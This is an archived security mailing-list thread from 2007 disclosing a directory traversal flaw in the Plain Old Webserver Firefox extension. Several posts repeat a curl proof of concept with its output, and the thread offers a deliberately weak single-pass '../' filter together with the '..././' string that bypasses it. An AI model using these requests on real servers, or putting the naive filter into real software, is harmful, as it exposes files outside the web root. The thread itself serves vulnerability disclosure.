Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
Stefano Di Paola wrote:
> Plain Old Web Server
> Good Old Dir Traversal
>
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> * Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
>> GET /../../../../ HTTP/1.1

Yep, I think it's just a rite of passage for all web servers.

Matthew Flaschen

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
It all depends on where in the request processing you apply the fix. It's possible that URL decoding hasn't occurred yet, whereby I can bypass your filter pretty easily. Not to mention Unicode...

Billy Hoffman
--
Lead Researcher, SPI Labs
SPI Dynamics Inc. - http://www.spidynamics.com
Phone: 678-781-4800
Direct: 678-781-4845

-Original Message-
From: ascii [mailto:[EMAIL PROTECTED]
Sent: Friday, February 09, 2007 7:29 PM
To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: Re: [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

pdp (architect) wrote:
> hey man, this is not news :)

hehe, the maintainer should update the changelog with this feature then :-)

i suggest this fix for the directory traversal bug

path = str_replace('../', '', path);

regards,

Francesco 'ascii' Ongaro
http://www.ush.it/

..././..././..././..././
how can't you love funsec?

Join us on IRC: irc.freenode.net #webappsec

The Web Security Mailing List: http://www.webappsec.org/lists/websecurity/
The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
I think that there is an implicit joke in the previous post...

"..././..././..././..././"
how can't you love funsec?

path = str_replace('../', '', path);

Becomes "../../../../" again...

GF
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
Billy Hoffman wrote:
> It all depends on where in the request processing you apply the fix. It's
> possible that URL decoding hasn't occurred yet, whereby I can bypass
> your filter pretty easily. Not to mention Unicode...

hehehe i was waiting for this : )

remember: this is funsec

the bypass for the filter is in the signature of the same mail

> path = str_replace('../', '', path);
>
> regards,
> Francesco 'ascii' Ongaro
> http://www.ush.it/
>
> ..././..././..././..././
> how can't you love funsec?

cause ..././..././..././..././ becomes ../../../../ since the replace is applied only once.

simple logic trick, no encoding at all

see you,
Francesco 'ascii' Ongaro
http://www.ush.it/
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
hey man, this is not news :)

On 2/9/07, Stefano Di Paola <[EMAIL PROTECTED]> wrote:
> Plain Old Web Server
> Good Old Dir Traversal
>
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> * Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
> > GET /../../../../ HTTP/1.1
> > User-Agent: HackTheHacker(tm)
> > Host: 127.0.0.1:6670
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> HTTP/1.1 200 OK
> < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
> Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
> < Content-Type: text/html
> Content-Type: text/html
> < pow_server: POW/0.0.7
> pow_server: POW/0.0.7
> < Content-Location: /../../../../
> Content-Location: /../../../../
> < Content-Length: 280
> Content-Length: 280
>
> firefox/
> bookmarks.html
> appreg
> default/
> pluginreg.dat
> * Connection #0 to host 127.0.0.1 left intact
> * Closing connection #0
>
> A new motto is on the way:
> HackTheHacker (ascii (tm))
>
> :)
>
> Cheers,
> Stefano
>
> On Fri, 09/02/2007 at 16.23 +, pdp (architect) wrote:
> > http://www.gnucitizen.org/blog/plain-old-webserver
> >
> > Must have Firefox Extension that allows you to do all sorts of crazy stuff.
> >
> > https://addons.mozilla.org/firefox/3002/
>
> --
> ...oOOo...oOOo
> Stefano Di Paola
> Software & Security Engineer
>
> Web: www.wisec.it
> ..

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
pdp (architect) wrote:
> hey man, this is not news :)

hehe, the maintainer should update the changelog with this feature then :-)

i suggest this fix for the directory traversal bug

path = str_replace('../', '', path);

regards,

Francesco 'ascii' Ongaro
http://www.ush.it/

..././..././..././..././
how can't you love funsec?
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
Plain Old Web Server
Good Old Dir Traversal

curl "127.0.0.1:6670/../../../../" -kivvv
* About to connect() to 127.0.0.1 port 6670
* Trying 127.0.0.1... connected
* Connected to 127.0.0.1 (127.0.0.1) port 6670
> GET /../../../../ HTTP/1.1
> User-Agent: HackTheHacker(tm)
> Host: 127.0.0.1:6670
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
< Content-Type: text/html
Content-Type: text/html
< pow_server: POW/0.0.7
pow_server: POW/0.0.7
< Content-Location: /../../../../
Content-Location: /../../../../
< Content-Length: 280
Content-Length: 280

firefox/
bookmarks.html
appreg
default/
pluginreg.dat
* Connection #0 to host 127.0.0.1 left intact
* Closing connection #0

A new motto is on the way:
HackTheHacker (ascii (tm))

:)

Cheers,
Stefano

On Fri, 09/02/2007 at 16.23 +, pdp (architect) wrote:
> http://www.gnucitizen.org/blog/plain-old-webserver
>
> Must have Firefox Extension that allows you to do all sorts of crazy stuff.
>
> https://addons.mozilla.org/firefox/3002/

--
...oOOo...oOOo
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..